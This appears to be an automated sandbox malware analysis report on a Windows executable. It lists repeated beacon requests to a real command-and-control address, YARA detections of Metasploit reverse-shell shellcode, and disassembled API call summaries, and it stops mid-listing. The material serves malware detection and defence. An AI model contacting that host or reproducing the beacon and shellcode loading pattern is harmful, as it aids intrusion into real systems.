Sep 27, 2024 16:48:27.248523951 CEST	328	OUT	GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Host: 89.197.154.115:7700 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49714	89.197.154.115	7700	4136	C:\Users\user\Desktop\DRVf7H9j4V.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 16:48:33.854751110 CEST	328	OUT	GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Host: 89.197.154.115:7700 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49715	89.197.154.115	7700	4136	C:\Users\user\Desktop\DRVf7H9j4V.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 16:48:40.448544979 CEST	328	OUT	GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Host: 89.197.154.115:7700 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49716	89.197.154.115	7700	4136	C:\Users\user\Desktop\DRVf7H9j4V.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 16:48:47.095710039 CEST	328	OUT	GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Host: 89.197.154.115:7700 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	63653	89.197.154.115	7700	4136	C:\Users\user\Desktop\DRVf7H9j4V.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 16:48:53.764013052 CEST	328	OUT	GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Host: 89.197.154.115:7700 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	63654	89.197.154.115	7700	4136	C:\Users\user\Desktop\DRVf7H9j4V.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 16:49:12.292284966 CEST	328	OUT	GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Host: 89.197.154.115:7700 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	63655	89.197.154.115	7700	4136	C:\Users\user\Desktop\DRVf7H9j4V.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 16:49:18.918940067 CEST	328	OUT	GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Host: 89.197.154.115:7700 Connection: Keep-Alive Cache-Control: no-cache

Target ID:	0
Start time:	10:48:05
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\DRVf7H9j4V.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DRVf7H9j4V.exe"
Imagebase:	0x400000
File size:	73'802 bytes
MD5 hash:	EF9E66020F10A61F05BC865B167248D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_24338919, Description: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_24338919, Description: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_24338919, Description: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	28.3%
Signature Coverage:	17.4%
Total number of Nodes:	92
Total number of Limit Nodes:	3

Executed Functions

Function 00690095 Relevance: 1.6, APIs: 1, Instructions: 125
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(0726774C,?,696E6977,0074656E), ref: 006900A6

Part of subcall function 00690105: InternetOpenA.WININET(A779563A,006900B4,00000000,00000000,00000000,00000000,00000000,?,696E6977,0074656E), ref: 0069010A

Memory Dump Source

Source File: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID: InternetLibraryLoadOpen
String ID:
API String ID: 2559873147-0
Opcode ID: dc52a87cc3c63a60bc39f2f89282fa35bd7c198f43a4f5a7275982faea7101c2
Instruction ID: 6c76d9627918b0570c42022a7dbf2d98376413efa427beb2ab28ad4067ed4ac0
Opcode Fuzzy Hash: dc52a87cc3c63a60bc39f2f89282fa35bd7c198f43a4f5a7275982faea7101c2
Instruction Fuzzy Hash: 1A31877100D7D46EEB22DBB48A998A3FF6FFE4375032511DED4C00D863D242A912C3A6

Function 00690105 Relevance: 6.2, APIs: 4, Instructions: 154
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(A779563A,006900B4,00000000,00000000,00000000,00000000,00000000,?,696E6977,0074656E), ref: 0069010A

Part of subcall function 00690225: ExitProcess.KERNEL32(56A2B5F0,00000000,006901EF,?,00000000,00000000,?,696E6977,0074656E), ref: 00690242

InternetConnectA.WININET(C69F8957,00000000,0069022B,00001E14,00000000,00000000,00000003,00000000,00000000,?,696E6977,0074656E), ref: 006901B0
HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,0069011C,00000000,00000000,00000000,84680200,00000000,?,696E6977,0074656E), ref: 006901C5
Sleep.KERNELBASE(E035F044,00001388,?,696E6977,0074656E), ref: 006901E5

Memory Dump Source

Source File: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID: InternetOpen$ConnectExitHttpProcessRequestSleep
String ID:
API String ID: 3361638204-0
Opcode ID: 7d39bbe59174fb60e31f98151c3302ef927af0be60f635ba57572ff16e215d11
Instruction ID: b9e22a7414f1141549994fb4ff1f23e14203b565a6da965abc6128076fe0c0a3
Opcode Fuzzy Hash: 7d39bbe59174fb60e31f98151c3302ef927af0be60f635ba57572ff16e215d11
Instruction Fuzzy Hash: B2417C711083893FFF2196A55CC9F7BBF6FEB427D8B21015AF5405A882E651ED01C2B5

Function 006901AA Relevance: 4.6, APIs: 3, Instructions: 56
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(C69F8957,00000000,0069022B,00001E14,00000000,00000000,00000003,00000000,00000000,?,696E6977,0074656E), ref: 006901B0
HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,0069011C,00000000,00000000,00000000,84680200,00000000,?,696E6977,0074656E), ref: 006901C5
Sleep.KERNELBASE(E035F044,00001388,?,696E6977,0074656E), ref: 006901E5

Memory Dump Source

Source File: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID: ConnectHttpInternetOpenRequestSleep
String ID:
API String ID: 3895984052-0
Opcode ID: 129c4a7d84763168dc248614861d05e1353dc605aa10c92fbfce95b48463f942
Instruction ID: 9d58e7679729064db614607666cbfbb544285032bfac92e8935496938f0515be
Opcode Fuzzy Hash: 129c4a7d84763168dc248614861d05e1353dc605aa10c92fbfce95b48463f942
Instruction Fuzzy Hash: 5FF05EF038131E3DF93112A75CDAF7B2A4DCB95BECF110020B608EA580EA90DD40C07A

Function 00690225 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006901AA: InternetConnectA.WININET(C69F8957,00000000,0069022B,00001E14,00000000,00000000,00000003,00000000,00000000,?,696E6977,0074656E), ref: 006901B0
Part of subcall function 006901AA: HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,0069011C,00000000,00000000,00000000,84680200,00000000,?,696E6977,0074656E), ref: 006901C5
Part of subcall function 006901AA: Sleep.KERNELBASE(E035F044,00001388,?,696E6977,0074656E), ref: 006901E5

ExitProcess.KERNEL32(56A2B5F0,00000000,006901EF,?,00000000,00000000,?,696E6977,0074656E), ref: 00690242

Memory Dump Source

Source File: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID: ConnectExitHttpInternetOpenProcessRequestSleep
String ID:
API String ID: 1983138902-0
Opcode ID: 6c3978b96584fe2db115ff66e57c80923a8db916f0f2145dffa80c26459278a4
Instruction ID: c2d498806128e7529f1aaafc9fe90142e389d452b7a992d228b626b465c856c2
Opcode Fuzzy Hash: 6c3978b96584fe2db115ff66e57c80923a8db916f0f2145dffa80c26459278a4
Instruction Fuzzy Hash: 9DC08C3040B28C8A9B06BB74410221E3F2199033043A820AEC08198432C2088006CB2A

Function 0040140F Relevance: 1.3, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ef405c489670d556df1225da78f3e26dd8f873b2e4b4bfd2d639d6386b93873
Instruction ID: b43aeb6041541093d402538bb96e736a53177450ba43d8348cecd530aab8e9e2
Opcode Fuzzy Hash: 9ef405c489670d556df1225da78f3e26dd8f873b2e4b4bfd2d639d6386b93873
Instruction Fuzzy Hash: D80141242AF240E6CA5464700C90AF42259A78B388B603833E80BBF6F3D97C8443A35F

Function 00401390 Relevance: 1.3, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(E553A458,00000000,00000244,00001000,00000040), ref: 00401418

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2f7ad1892db9d076f9614ca5f2bee8c7bdd05cf97c0b4b08d2d38629c3036920
Instruction ID: 36515bd9a21eca4ffc3442796705fa328addfbc3c26c90cc4d31d2f2eaf89b35
Opcode Fuzzy Hash: 2f7ad1892db9d076f9614ca5f2bee8c7bdd05cf97c0b4b08d2d38629c3036920
Instruction Fuzzy Hash: 36E0173138D250E2F51050112882BB8218D074D741E302433AA0B7AEF7A8BC0443325F

Function 0040139A Relevance: 1.3, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(E553A458,00000000,00000244,00001000,00000040), ref: 00401418

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 76511478a1293fcbe4e4fc8c354e56449f04188a766149da1ff90902e34aa6e7
Instruction ID: 4caf21fafcdbd35a8187c40c7f4a7ebb3d6fde15630f7e773a5ec81ff96f2d60
Opcode Fuzzy Hash: 76511478a1293fcbe4e4fc8c354e56449f04188a766149da1ff90902e34aa6e7
Instruction Fuzzy Hash: B0E0173078D255EAE61050115892BB82089078D741F346437AA0F7AAF6E9BC054372AF

Function 004013E4 Relevance: 1.3, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(E553A458,00000000,00000244,00001000,00000040), ref: 00401418

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2a5d81dc87a261b2252c3e7fd3a5bbe2569150189334329988719ab59b711cb5
Instruction ID: 4e47fe8511e51b7c845068726a1751513bcc1e9ac111c00a738d05cde4b35e22
Opcode Fuzzy Hash: 2a5d81dc87a261b2252c3e7fd3a5bbe2569150189334329988719ab59b711cb5
Instruction Fuzzy Hash: B3D0A925608210ABC700627818463F871850B8C300F204037E01BBA2F2EAB8494B32BF

Function 004013FE Relevance: 1.3, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(E553A458,00000000,00000244,00001000,00000040), ref: 00401418

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 597d6537576dd44ed3367bbe92ea61a3c23de9647e80ad20aeafef875af113e1
Instruction ID: ed4fc12d8f14c241b0cd07e89e342629f8af31190ef920adaa250682d43661c3
Opcode Fuzzy Hash: 597d6537576dd44ed3367bbe92ea61a3c23de9647e80ad20aeafef875af113e1
Instruction Fuzzy Hash: 6EC09224308519AAC6406174188617C10820ACC3843B84037D017BA2F7EE7C898772AF

Non-executed Functions

Function 0040A430 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteCriticalSection.KERNEL32(00410728), ref: 0040A475

Strings

^, xrefs: 0040A3F6

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID: CriticalDeleteSection
String ID: ^
API String ID: 166494926-1590793086
Opcode ID: 0f2d0937ee027a78d66c8a320dee57459cf8de25c20a429baf7a913160c9b7e3
Instruction ID: 80ce654e35391de0925871baf317a5aa4475a278df2f13d72fc40d479a512080
Opcode Fuzzy Hash: 0f2d0937ee027a78d66c8a320dee57459cf8de25c20a429baf7a913160c9b7e3
Instruction Fuzzy Hash: 8131353014A3954FD712CB789CA8AD67FE0AF47330F1846ABD8A4DB1E3D2798486C746

Function 004058A1 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64ffe756a1041e19f60a1079324893caef8a313680ad2cc6323e13a05ebc89cc
Instruction ID: 90cf158eb33d83088b1a19a937ed0ebdbb073ad35d0ba4845464958a89f681b7
Opcode Fuzzy Hash: 64ffe756a1041e19f60a1079324893caef8a313680ad2cc6323e13a05ebc89cc
Instruction Fuzzy Hash: E3517C32904A549FCB12DE28C8901AB7B71EF42324F0842BFD845EB2C2D7389917CF89

Function 0040162C Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc52a87cc3c63a60bc39f2f89282fa35bd7c198f43a4f5a7275982faea7101c2
Instruction ID: 18b18c78ea57e2933f785eb98fb0eed2e6e3ba4ae975db3f4b5666646386f11a
Opcode Fuzzy Hash: dc52a87cc3c63a60bc39f2f89282fa35bd7c198f43a4f5a7275982faea7101c2
Instruction Fuzzy Hash: BA317A7110D7D46AC3229B748A898A3FF69FE4375432911EFD0C11F0B3D26AA812C39A

Function 00401E39 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42d2b652937673e1029f448e2087c4e9ac9b0e27a5ffeb98a6424e93d54e0f3d
Instruction ID: 2d10ade6e87be67a499cb207e5ebd46864f414385da39928dcdaeebba1b7a316
Opcode Fuzzy Hash: 42d2b652937673e1029f448e2087c4e9ac9b0e27a5ffeb98a6424e93d54e0f3d
Instruction Fuzzy Hash: 643157B690E3C49FCB028F3488E46D5BF74EF97218B5942DAD484AB0A3C338A546C759

Function 004066E0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6c21b50467ac891439f28963d3b685e07f632f728d59d2fd0032456406df1a
Instruction ID: 832121b05858ae4075cb9f681042bbcfc365b3e5eb6dab71abeab49b36f88987
Opcode Fuzzy Hash: 9c6c21b50467ac891439f28963d3b685e07f632f728d59d2fd0032456406df1a
Instruction Fuzzy Hash: 41215B318183586BDB118E399D45F57FFBCFB43720F400669E990B71D2CA65E8018768

Function 004059A4 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a81bc39c1367242cb9ff8046315148dc1a9e5dd8e24598f1063b759c56dd32f0
Instruction ID: bf6761084c7165da02145a9ae339b24aac8a25a749fca72c0697e3754ca11673
Opcode Fuzzy Hash: a81bc39c1367242cb9ff8046315148dc1a9e5dd8e24598f1063b759c56dd32f0
Instruction Fuzzy Hash: B12127716092959FC706CF64D8819D2BBB4EF06320B0843DED5909F293E7389806CB96

Function 004056B1 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5a53422ff17af1b030cf4cb7388a167bcebdceea0aac70cde12f0aa1d7cbe07
Instruction ID: 4acf59eda68d288d153774ea87955d9bc959ecf303e0018fc29d7d30a4288bf0
Opcode Fuzzy Hash: f5a53422ff17af1b030cf4cb7388a167bcebdceea0aac70cde12f0aa1d7cbe07
Instruction Fuzzy Hash: 44F0A475A05344AFCB209E3CD845CE7BBBDEFC7314B14655AE9847B257C7309806C6A8

Function 0040566F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce153e37285b3a502b17d5c365f3adf43ec6aa6430d9ed28b91f4e7dc34483f6
Instruction ID: 4076726633fc522666fe6305210414c854a45d5866a2e46fb70afbfe4056e306
Opcode Fuzzy Hash: ce153e37285b3a502b17d5c365f3adf43ec6aa6430d9ed28b91f4e7dc34483f6
Instruction Fuzzy Hash: 61F02875905344AFC7209E2CD845CE7BBBDEFC7314B10556AE9883B253C7309806C7A8

Function 004056C0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

